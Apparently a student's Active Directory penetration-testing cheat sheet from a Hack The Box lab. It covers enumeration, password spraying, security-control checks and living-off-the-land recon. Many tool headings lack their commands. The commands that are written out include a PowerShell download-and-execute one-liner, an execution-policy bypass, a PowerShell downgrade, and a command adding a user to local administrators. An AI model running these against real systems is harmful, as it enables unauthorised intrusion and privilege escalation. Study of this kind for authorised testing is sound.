================================================================================================================================================================================================
Check out the following links:
HTB Windows Priv Esc Win Priv Esc Examples Syntax for ToolsInitial Enumeration of the domain
ID users
Finding a User
Linux:
Windows:
At this point in our assessment, we would want to perform enumeration using a tool such as BloodHound to determine whether any or all of these hashes are worth cracking
Password Spraying
Enumerating & retrieving password policies
Linux:
Can we transfer any tools to windows to use?
Windows:
Making a user list for Password spraying
Getting list of users:
User list with full credentials:
Internal Password Spraying
Linux:
Bash one liner
Using kerbrute
Using crackmap and filtering logon failures
Validating creds with crackmapexec
Local admin password reuse (where else can we use same password)
Windows:
Enumerating Security Controls
Windows Defender:
App Locker:
An application whitelist is a list of approved software applications or executables that are allowed to be present and run on a system
PowerShell Constrained Language Mode
Restricted = constrained
LAPS
is used to randomize and rotate local administrator passwords on Windows hosts and prevent lateral movement.
Using Find-LAPSDelegatedGroups:
the rights on each computer with LAPS enabled for any groups with read access and users with "All Extended Rights:
search for computers that have LAPS enabled when passwords expire
Credentialed Enumeration
From Linux:
CrackMapExec:
SMBMap:
RPCClient:
Impacket:
PSexec.py
Psexec.py is a clone of the Sysinternals
wmiexec.py
commands are executed through WMI
Windapsearch.py
can use to enumerate users, groups, and computers from a Windows domain by utilizing LDAP queries.
Domain admins:
Privileged users:
Bloodhound.py
once we have domain creds – we run bloodhound
Credentialed Enumeration
From Windows:
AD Powershell Module
Discover modules
Load AD Module
Get Domain Info
Get-ADUser (serviceprinciplaname)
Checking for trust relationships
Group Enumeration
Detailed Group info
Group Membership
Powerview
helps us gain situational awareness within an AD environment
Domain User info
Recursive Group Membership
Trust Enumeration
Testing for local admin access
Finding users with SPN set
Sharpview
Info on specific user
Snaffler
-s = print results to console, d = domain, -o write to log file, -v =verbosity, Data = prints results to screen
Bloodhound
Running sharphound collector
Living off the land
Env commands for host and network recon
Pc name: hostname
Os version: [System.Environment]::OSVersion.Version
Patches and hotfixes applied: wmic qfe get Caption,Description,HotFixID,InstalledOn
Network adapter state and config: ipconfig /all
Domain name to which host belongs: set %USERDOMAIN%
Prints name of DC host checks in with (only from cmd): set %logonserver%
Systeminfo – covers all the above in one command
Harnessing powershell
Lists available modules loaded for use: Get-Module
Prints execution policy for each scope: Get-ExecutionPolicy -List
Set-ExecutionPolicy Bypass -Scope Process
Powershell history: Get-Content C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt
Key paths, users, comp info: Get-ChildItem Env: | ft Key,Value
Download file from web, and call it from memory: powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL to download the file from'); <follow-on commands>"
Downgrading powershell: powershell.exe -version 2
Checking Defences
Firewall checks:
From cmd:
Comp status and configs
Am I alone check (ie anyone else logged on):
Network Information
List all known hosts store in arp table: arp -a
Print adapter settings for host – ipconfig /all
Routing table, iding known networks – route print
Status of firewall: netsh advfirewall show states
Windows Management Instrumentation (WMI)
Prints patch level: wmic qfe get Caption,Description,HotFixID,InstalledOn
Display basic host info + attributes within list: wmic computersystem get Name,Domain,Manufacturer,Model,Username,Roles /format:List
A list of all processes on host: wmic process list /format:list
Displays info about the domain and DC: wmic ntdomain list /format:list
Displays info about all local accounts and any DC that have logged in device: wmic useraccount list /format:list
Info about all local groups: wmic group list /format:list
Dumps info about any sys accounts that are being used as service accounts: wmic sysaccount list /format:list
Net Commands
net accounts - Information about password requirements
net accounts /domain - Password and lockout policy
net group /domain - Information about domain groups
net group "Domain Admins" /domain - List users with domain admin privileges
net group "domain computers" /domain - List of PCs connected to the domain
net group "Domain Controllers" /domain - List PC accounts of domains controllers
net group <domain_group_name> /domain - User that belongs to the group
net groups /domain - List of domain groups
net localgroup - All available groups
net localgroup administrators /domain - List users that belong to the administrators group inside the domain (the group Domain Admins is included here by default)
net localgroup Administrators - Information about a group (admins)
net localgroup administrators [username] /add - Add user to administrators
net share - Check current shares
net user <ACCOUNT_NAME> /domain - Get information about a user within the domain
net user /domain - List all users of the domain
net user %username% - Information about the current user
net use x: \computer\share - Mount the share locally
net view - Get a list of computers
net view /all /domain[:domainname] - Shares on the domains
net view \computer /ALL - List shares of a computer
net view /domain - List of PCs of the domain
Dsquery DLL
Dsquery user – user search
Dsquery computer – computer search
Dsquery * "CN=Users,DC=INLANEFREIGHT,DC=LOCAL" – wildcard search
dsquery * -filter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32))" -attr distinguishedName userAccountControl - Users With Specific Attributes Set (PASSWD_NOTREQD)
dsquery * -filter "(userAccountControl:1.2.840.113556.1.4.803:=8192)" -limit 5 -attr sAMAccountName – searching for domain controllers
LDAP Filtering
UAC values 1,2,32,64,128,512,2048,4096,8192,65536,524288,1048576 all mean something different
OID match strings / logical operators